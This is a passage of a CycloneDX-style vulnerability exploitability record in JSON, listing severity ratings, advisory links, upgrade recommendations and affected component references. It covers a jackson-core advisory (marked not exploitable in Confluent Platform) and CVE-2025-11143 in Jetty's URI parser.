research was performed in collaboration with [rohan-repos](https://github.com/rohan-repos)", "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-core to version 2.21.1, 2.18.6", "advisories": [ { "url": "https://github.com/advisories/GHSA-72hv-8253-57qq" }, { "url": "https://github.com/FasterXML/jackson-core" }, { "url": "https://github.com/FasterXML/jackson-core/commit/b0c428e6f993e1b5ece5c1c3cb2523e887cd52cf" }, { "url": "https://github.com/FasterXML/jackson-core/pull/1555" }, { "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-72hv-8253-57qq" } ], "published": "2026-02-28T02:01:05+00:00", "updated": "2026-04-07T16:30:17+00:00", "affects": [ { "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0", "versions": [ { "version": "2.19.0", "status": "affected" } ] }, { "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4", "versions": [ { "version": "2.19.4", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#68bd507c-329a-4836-9ba3-7974c6d6f083" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#303ffe70-0534-468c-8e33-40566f1de1ad" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:b5054fdf-8701-40fa-bada-ab5917185205/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:1e59dc1b-6b11-4d3e-80e8-4b1d3b1a2992/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#7b43061a-89fa-4de5-845d-d1f1d20c730b" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#07faab44-cb55-465d-8d17-371b44a360eb" }, { "ref": "urn:cdx:34e5c353-2a48-4fe2-805f-8f192280376d/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:ba2db0a6-0fda-4646-81f2-1b48896717af/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#064f20f7-d3eb-48f9-a477-23fb1138d888" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#01e40fee-9cd7-4cf4-a11a-3ef036d808d4" }, { "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#05cbbea0-f240-4bbc-a340-babfd2e02dee" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1b1e9580-f819-4bbf-bb05-ccc7d88c90c0" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1804ea1e-3e80-4e5b-add5-e3d63781036e" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#229f8756-c882-46d8-8784-7ef81cc3537a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.0" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#301a8979-de46-445e-a607-0e0d58d56d5f" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#20a5f32e-ecbb-44b0-85a5-7bdab82d6029" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#44f2275f-7782-4995-ade9-23fd56d6935d" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#7524504f-afd9-4e9f-aeba-78ab9f4d77c6" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#b5568339-d548-4c15-8879-7baff6d70130" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0620fb18-d0fa-486f-be09-c7d2902e26ef" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#8018e9cf-9cf9-476d-8d3b-8e25e4b11258" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#b3d2ce3c-c7ec-45b4-a7af-a6172088df81" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.19.4" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "This issue is not exploitable in the context of Confluent Platform. The async parser is not used in Confluent Platform components. " } }, { "id": "CVE-2025-11143", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "ghsa" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "source": { "name": "nvd" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "cwes": [ 20 ], "description": "The Jetty URI parser has some key differences to other common parsers when evaluating invalid or unusual URIs.\u00a0Differential parsing of URIs in systems using multiple components may result in security by-pass. For example a component that enforces a black list may interpret the URIs differently from one that generates a response.\u00a0At the very least, differential parsing may divulge implementation details.", "recommendation": "Upgrade org.eclipse.jetty:jetty-http to version 12.0.31, 12.1.5", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-11143" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-11143" }, { "url": "https://github.com/jetty/jetty.project" }, { "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-wjpw-4j6x-6rwh" }, { "url": "https://github.com/user-attachments/files/22222625/Java.Eclipse.Jetty.Report_.Incorrect.Parsing.Priority.of.the.IPv6.Hostname.Delimeter.pdf" }, { "url": "https://github.com/user-attachments/files/22222626/Java.Eclipse.Jetty.Report_.The.Parsing.Priority.of.the.Delimiter.pdf" }, { "url": "https://github.com/user-attachments/files/22222627/Java.Eclipse.Jetty.Report_.Parsing.Difference.Due.to.Deformed.Scheme.pdf" }, { "url": "https://github.com/user-attachments/files/22222630/Java.Eclipse.Jetty.Report_.Improper.IPv4-mapped.IPv6.Parsing.pdf" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11143" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-11143" } ], "published": "2026-03-05T10:15:54+00:00", "updated": "2026-03-06T20:30:58+00:00", "affects": [ { "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#0377bc3c-a7c9-45f9-8f7d-ce19e57e07e6" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#6546186d-9de7-4c19-a57a-81ed02465586" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": 